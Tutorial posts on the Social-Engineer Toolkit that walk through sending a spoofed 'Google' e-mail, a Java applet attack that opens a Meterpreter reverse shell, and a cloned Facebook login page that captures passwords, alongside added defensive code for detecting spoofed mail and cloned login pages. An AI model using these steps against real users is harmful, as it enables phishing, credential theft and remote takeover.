SET — The Social Engineering Toolkit
Social engineering attacks are one of the top techniques used against networks today. Why spend days, weeks or even months trying to penetrate layers of network security when we can simply trick a user into running a file that gives us full access to their machine, bypassing antivirus, firewalls and many intrusion detection systems?
Today this is most commonly seen in phishing attacks: craft an e-mail or a fake website that tricks a user into running a malicious file that creates a backdoor into their system. But as security professionals, how can we test this against our own network? Would such an attack work, and how could we defend against it?
Kali Linux includes one of the most popular social engineering toolkits available, David Kennedy's Social Engineering Toolkit (SET). David's team is very active on SET: new features and attacks are always being added, and more recently several non-social-engineering tools have been added as well, making it a very robust attack tool.
In this post we will take a look at some of the tools included with SET and two of the attack options, both PowerShell-based attacks.
We can start SET from the Kali Linux main menu :
- Spear-Phishing Attack Vectors
- Website Attack Vectors
- Infectious Media Generator
- Create a Payload and Generator
- Mass Mailer Attack
- Arduino-Based Attack Vector
- Wireless Access Point Attack Vector
- QRCode Generator Attack Vector
- Powershell Attack Vectors
- SMS Spoofing Attack Vector
- Third Party Modules
In this tutorial we choose option 5, Mass Mailer Attack.
Mass Mailer
One way a social engineer attacks a network is to send a flood of e-mails to company addresses and see who responds, or who runs the malicious attachment sent with them.
After entering option 5 in SET we get two options:
- E-mail Attack single E-mail Address
- E-mail Attack Mass Mailer
The screenshot follows:
For this example let's just send one. We press 1 and hit «Enter».
Then we enter a target e-mail address. See the following screenshot:
Now we select option 1 to send through a Gmail account rather than our own server. For this tutorial we use a Gmail account created just for the test; the Gmail address and password must be valid, because SET logs in to that account to send the message.
Then we choose a spoofed name to use for the «from» line of the message. Let's use «supporrt@google.com» so that it looks as if it comes from Google. Pay special attention to this field, as this is where the real social engineering takes place.
Now SET asks for the password of the Gmail account.
Then we answer yes at the prompt «Flag this message/s as high priority?»
We don't want to attach any malicious file, so we answer «no» when prompted «Do you want to attach a file?»
Next, enter an e-mail subject line, for example «Important update».
Enter «p» when prompted «Send the message as html or plain?»
Now type in a fake message, preferably one that will entice the victim to click a malicious link included in it, or to surf to a malicious web page. In actual defensive practice this could simply be a test web page that records the IP address of those who were tricked into visiting it. That way, as security professionals, we know who in our organization needs better education on the risks of malicious e-mails.
When finished we type «END» on the last line, as in the following screenshot.
Then press «Enter» and SET sends the e-mail to the victim.
The message in the screenshot above is obviously a silly fake, but something like this (with a much more believable message) could be used to test employees' ability to detect, resist and report phishing attempts.
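Added example (not from the original post): the receiving side of the e-mail above. A mail gateway or SOC script can catch this kind of «from» spoofing by checking DMARC alignment, that is, whether the domain in the From header is the one that actually passed SPF or DKIM. The sample message, TRUSTED_DOMAINS and the function names are constructed for illustration.

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Assumed: brand domains this organisation routinely receives legitimate mail from.
TRUSTED_DOMAINS = {"google.com"}

# Constructed sample of how the message sent above arrives at the recipient's mail
# server: Gmail relays it, so SPF and DKIM pass for gmail.com, while the From header
# claims supporrt@google.com. Header values are made up for illustration.
SPOOFED_RAW = """\
Return-Path: <throwaway.account@gmail.com>
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=gmail.com; dkim=pass header.d=gmail.com
From: Google Support <supporrt@google.com>
To: employee@example.org
Subject: Important update
X-Priority: 1

Your account needs an important update. Click the link below.
"""
# Constructed aligned counterpart: the From domain matches the authenticated domain.
ALIGNED_RAW = SPOOFED_RAW.replace("supporrt@google.com", "someone@gmail.com")

def domain_of(header_value):
    """Lower-cased domain of an address header ('' if the header is missing)."""
    return parseaddr(str(header_value or ""))[1].rpartition("@")[2].lower()

def authenticated_domains(auth_results):
    """Domains for which the receiving MTA recorded spf=pass or dkim=pass."""
    pattern = r"(?:spf|dkim)=pass[^;]*?(?:smtp\.mailfrom|header\.d)=([\w.-]+)"
    return {m.group(1).lower() for m in re.finditer(pattern, str(auth_results or ""))}

def analyse(raw):
    """Return a list of findings; an empty list means the From header is aligned."""
    msg = email.message_from_string(raw, policy=policy.default)
    from_domain = domain_of(msg["From"])
    envelope_domain = domain_of(msg["Return-Path"])
    passed = authenticated_domains(msg["Authentication-Results"])
    findings = []
    if from_domain != envelope_domain:
        findings.append(f"From domain {from_domain} differs from envelope sender {envelope_domain}")
    if from_domain not in passed:
        # DMARC strict alignment: the From domain itself needs an SPF or DKIM pass.
        findings.append(f"no SPF/DKIM pass for From domain {from_domain}: DMARC alignment fails")
    if findings and from_domain in TRUSTED_DOMAINS:
        findings.append(f"unaligned message impersonates trusted domain {from_domain}")
    return findings
```

Real DMARC evaluation also accepts relaxed alignment (a match on the organisational domain); an exact match is used here to keep the check short.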
Java PYInjector Attack
So far we have just sent a fake e-mail that could redirect someone to a bogus site. But what if we could build a fake site that offered up a booby-trapped script, and, if the user allowed it to run, the script gave us a shell running as that user?
The Java PYInjector attack combines the anti-virus-bypassing capabilities of PowerShell-based attacks with a Java applet. We will use SET to create a fictitious website that offers up a booby-trapped Java app; if the user allows the app to run, we get a full remote session on the system.
We will be using a Windows 8 system as the target in the example.
From the SET menu we choose 1 for Social-Engineering Attacks, then 2 for Website Attack Vectors, then 1 for the Java Applet Attack Method.
This creates a Java app that carries a backdoor shell.
For comparison, the Metasploit Browser Exploit method attacks the client system with Metasploit browser exploits. The Credential Harvester Attack is pretty slick: it clones an existing website (like Facebook) and then stores any credentials entered into it.
TabNabbing works great if the client has a lot of browser tabs open: it waits a certain time and then switches one of the tabs to a page that SET creates. The Web-Jacking attack uses iFrame replacement to make a malicious link look legitimate, and finally the Multi-Attack combines several of the above attacks.
Next choose 1 for Web Templates to have SET create a generic web page, or option 2 «Site Cloner» to let SET use an existing website as the template for the attack web page.
Choose yes or no for NAT/port forwarding. Selecting no is usually sufficient in an internal testing lab.
Enter the IP address of our SET machine. We can open another terminal window and run the following command to find the IP address:
The IP address is in the following screenshot:
Now select a template: choose 1 «Java Required».
Then we pick the payload we want delivered. We usually choose 14 «ShellCodeExec Alphanum Shellcode» (this one is interesting as it runs from memory, never touching the hard drive, which effectively bypasses some anti-virus programs) or 15 «PYInjector Shellcode». For now let's go ahead and use option 15, «PYInjector Shellcode Injection», on the default port 443.
Next choose a payload to inject. Let's pick the first option, «Windows Meterpreter Reverse TCP».
Now SET is ready to go and does several things: it creates and encrypts the PowerShell injection code, creates the website, loads Metasploit and starts a handler waiting for people to connect. When done, our screen looks like the following screenshot:
Now we need to trick the victim into clicking our malicious link. Since we host the site on our local machine, the link is the IP address of our Kali Linux system, and the victim must be on the same network. The victim's browser asks in a popup whether to run our Java applet. If he clicks «Run», our Meterpreter session starts and we can do anything on the victim's PC.
To do this over the WAN (on the Internet, not only in the local network), read the tutorial Easy Port Forwarding using SSH.
The Social Engineering Toolkit is truly a robust and feature rich tool for any corporate security testing team.
Spend some time with SET and check out the numerous options it offers for attacking a target system. You can use SET to create malicious CD/DVD and USB media (for leaving in corporate parking lots, etc.), a slew of Arduino-based attacks, a Microsoft SQL brute forcer, a Wireless Access Point attack, a Mass Mailer, a QR code attack and a bunch of website social engineering attacks that we have not covered yet. Comment below which tutorial should come next.
Source
Social Engineering Toolkit — Kali: Credential Harvester: Hack Facebook
Hacking Facebook
Social Engineering Toolkit
Humans are the weakest link in any security system
Shashwat (That’ll be me)
If you have read the previous post, then you know what I'm talking about. The Social Engineering Toolkit does not exploit a vulnerability in the mechanism of any service; it exploits the weakness in the human element of security. Some official words from the official guys before we move on to the actual hacking:
Kali Linux
Se-toolkit
# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update.
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 4.3.9 [---]
[---] Codename: 'Turbulence' [---]
[---] Follow us on Twitter: @trustedsec [---]
[---] Follow me on Twitter: @dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>
Explanation
- 1 selects Social-Engineering Attacks. An obvious choice if you read the other options from 1 to 9 (and 99 for exit).
- Then 2 selects Website Attack Vectors. Not that obvious. The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
- Then 3 selects Credential Harvester. The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
Now you'll see something like this:
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
Find your IP
Back to se-toolkit
Now it'll ask you to specify the IP to which the data is supposed to be sent. That'll be your IP address. Since this is your internal (local) IP address, the fake Facebook page will only work for computers connected to your LAN.
Now it’ll ask for the page to be cloned. Enter https://www.facebook.com/.
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/
Now, in your browser on Kali Linux, enter your IP. It will display the Facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMware or VirtualBox, you can also try entering the IP in the browsers there. It will work.
Live demonstration
On the Kali Linux Machine itself
POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password
On Windows 8 machine (host)
POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2
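Added example (not part of the original tutorial or of SET): how a URL scanner or a browser extension's backend can recognise a cloned login page like the one served above. It parses the HTML, finds forms that contain a password field and flags those whose action resolves to a bare IP address, to plain http, or to a host that is not a legitimate login host for the brand named in the page title. BRAND_LOGIN_HOSTS, CLONED_HTML and the function names are assumptions constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumed allowlist: brand word in <title> -> hosts allowed to receive that brand's login form.
BRAND_LOGIN_HOSTS = {"facebook": {"facebook.com", "www.facebook.com", "m.facebook.com"}}

# Constructed stand-in for the cloned page the harvester serves (not SET's actual output):
# the login form with the email/pass fields seen above posts straight back to the page's host.
CLONED_HTML = ("<html><head><title>Welcome to Facebook</title></head><body><form action='/' method='post'>"
               "<input name='email'><input name='pass' type='password'></form></body></html>")

class LoginFormParser(HTMLParser):
    """Collect the page title and, for each <form>, its action and input (name, type) pairs."""
    def __init__(self):
        super().__init__()
        self.title, self._in_title, self.forms = "", False, []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self.forms.append({"action": a.get("action") or "", "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append((a.get("name") or "", (a.get("type") or "text").lower()))
    def handle_endtag(self, tag):
        self._in_title = self._in_title and tag != "title"
    def handle_data(self, data):
        self.title += data if self._in_title else ""

def is_ip_literal(host):
    try:
        return bool(ipaddress.ip_address(host))
    except ValueError:
        return False

def check_login_page(page_url, html):
    """Findings for each password form whose target looks like a credential harvester."""
    parser = LoginFormParser()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if "password" not in {kind for _, kind in form["inputs"]}:
            continue  # not a login form
        target = urlsplit(urljoin(page_url, form["action"]))  # resolve relative actions
        host = target.hostname or ""
        if is_ip_literal(host):
            findings.append(f"password form posts to bare IP address {host}")
        if target.scheme != "https":
            findings.append(f"password form posts over {target.scheme}, not https")
        for brand, hosts in BRAND_LOGIN_HOSTS.items():
            if brand in parser.title.lower() and host not in hosts:
                findings.append(f"page titled '{parser.title}' sends credentials to {host}, not a {brand} host")
    return findings
```

Run against the LAN address from the tutorial (`check_login_page("http://192.168.154.133/", CLONED_HTML)`) all three checks fire; the same HTML served from www.facebook.com over https produces no findings.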
Source